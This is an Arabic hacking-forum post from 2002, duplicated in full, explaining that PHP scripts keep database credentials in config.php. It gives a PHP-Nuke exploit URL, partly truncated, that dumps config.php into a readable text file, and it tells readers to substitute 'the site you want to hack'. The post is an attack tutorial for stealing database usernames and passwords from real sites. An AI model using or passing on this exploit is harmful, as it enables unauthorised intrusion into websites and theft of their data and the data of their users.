hi_HaCkEr
27-12-2002, 06:20
ملف الـ Config
هذا الملف أكيد أي شخص يتعامل مع الـ PHP عارفه كويس وباعتقادي انه الكثير من الهكر عارفينه وأنا بهذا الموضوع المختصر أحاول أعرف فائدته .
- ماهو ملف الـ Config ؟
ملف الـ Config هو ملف يوجد في الكثير من سكربتات الـ PHP مثل منتديات vBulletin ومجلات الـ Nuke .
يحتوي هذا الملف على اسم مستخدم وكلمة مرور قاعدة البيانات الخاصة بالسكربت .
مثال:
$dbusername="إسم المستخدم لقاعدة البيانات";
$dbpassword="كلمة المرور لقاعدة البيانات";
$dbname="إسم قاعدة البيانات";
- مافائدة هذا الملف بالنسبة للمخترق ؟
فائدة هذا الملف أنك إذا استطعت تنزيله أو طبعه بإحدى الثغرات والإطلاع عليه فتجد بداخله اسم مستخم وكلمة مرور قاعدة البيانات كما أشرت سابقا وبهذا يمكنك الدخول على قاعدة البيانات والدخول إلى الجداول والحصول على الكثير من المعلومات.
-كيف يمكنني الحصول على هذا الملف أو عرضه ؟
هذا الملف يكون محمي بــ.htaccess ولانه من بامتداد php لايمكن عرضه من خلال المتصفح ولهذا لابد من استخدام إحدى الثغرات للحصول عليه وعرضعه .
- ثغرة في مجلة الـ Nuke تمكنك من طبع الملف وعرضه:
الثغرة:
http://www.server.net/admin.php?upl...e=ultramode.txt
=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
عمل الثغرة:
-=طبع ملف الكونفيج config.php الى الملف النصي الموجودultramode.txt لن تحتاج تحميل ملف نصي لطبع الملف
-=ما عليك سوى الدخول الى http://server.com/ultramode.txt وستجد باس واليوزر التابع لقاعدة بيانات الموقع=-
=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
ملاحظات
1- بدل server.com بالموقع المراد اختراقه
2- تأكد من موقع المجلة مثال : http://server.com/nuke
3- هذه الثغرة لا تعمل مع اصدار 5.2 كما يظن البعض
منقول
--- انتهى الدرس---
تحياتي
|4|
هذا الملف أكيد أي شخص يتعامل مع الـ PHP عارفه كويس وباعتقادي انه الكثير من الهكر عارفينه وأنا بهذا الموضوع المختصر أحاول أعرف فائدته .
- ماهو ملف الـ Config ؟
ملف الـ Config هو ملف يوجد في الكثير من سكربتات الـ PHP مثل منتديات vBulletin ومجلات الـ Nuke .
يحتوي هذا الملف على اسم مستخدم وكلمة مرور قاعدة البيانات الخاصة بالسكربت .
مثال:
$dbusername="إسم المستخدم لقاعدة البيانات";
$dbpassword="كلمة المرور لقاعدة البيانات";
$dbname="إسم قاعدة البيانات";
- مافائدة هذا الملف بالنسبة للمخترق ؟
فائدة هذا الملف أنك إذا استطعت تنزيله أو طبعه بإحدى الثغرات والإطلاع عليه فتجد بداخله اسم مستخم وكلمة مرور قاعدة البيانات كما أشرت سابقا وبهذا يمكنك الدخول على قاعدة البيانات والدخول إلى الجداول والحصول على الكثير من المعلومات.
-كيف يمكنني الحصول على هذا الملف أو عرضه ؟
هذا الملف يكون محمي بــ.htaccess ولانه من بامتداد php لايمكن عرضه من خلال المتصفح ولهذا لابد من استخدام إحدى الثغرات للحصول عليه وعرضعه .
- ثغرة في مجلة الـ Nuke تمكنك من طبع الملف وعرضه:
الثغرة:
http://www.server.net/admin.php?upl...e=ultramode.txt
=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
عمل الثغرة:
-=طبع ملف الكونفيج config.php الى الملف النصي الموجودultramode.txt لن تحتاج تحميل ملف نصي لطبع الملف
-=ما عليك سوى الدخول الى http://server.com/ultramode.txt وستجد باس واليوزر التابع لقاعدة بيانات الموقع=-
=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
ملاحظات
1- بدل server.com بالموقع المراد اختراقه
2- تأكد من موقع المجلة مثال : http://server.com/nuke
3- هذه الثغرة لا تعمل مع اصدار 5.2 كما يظن البعض
منقول
--- انتهى الدرس---
تحياتي
|4|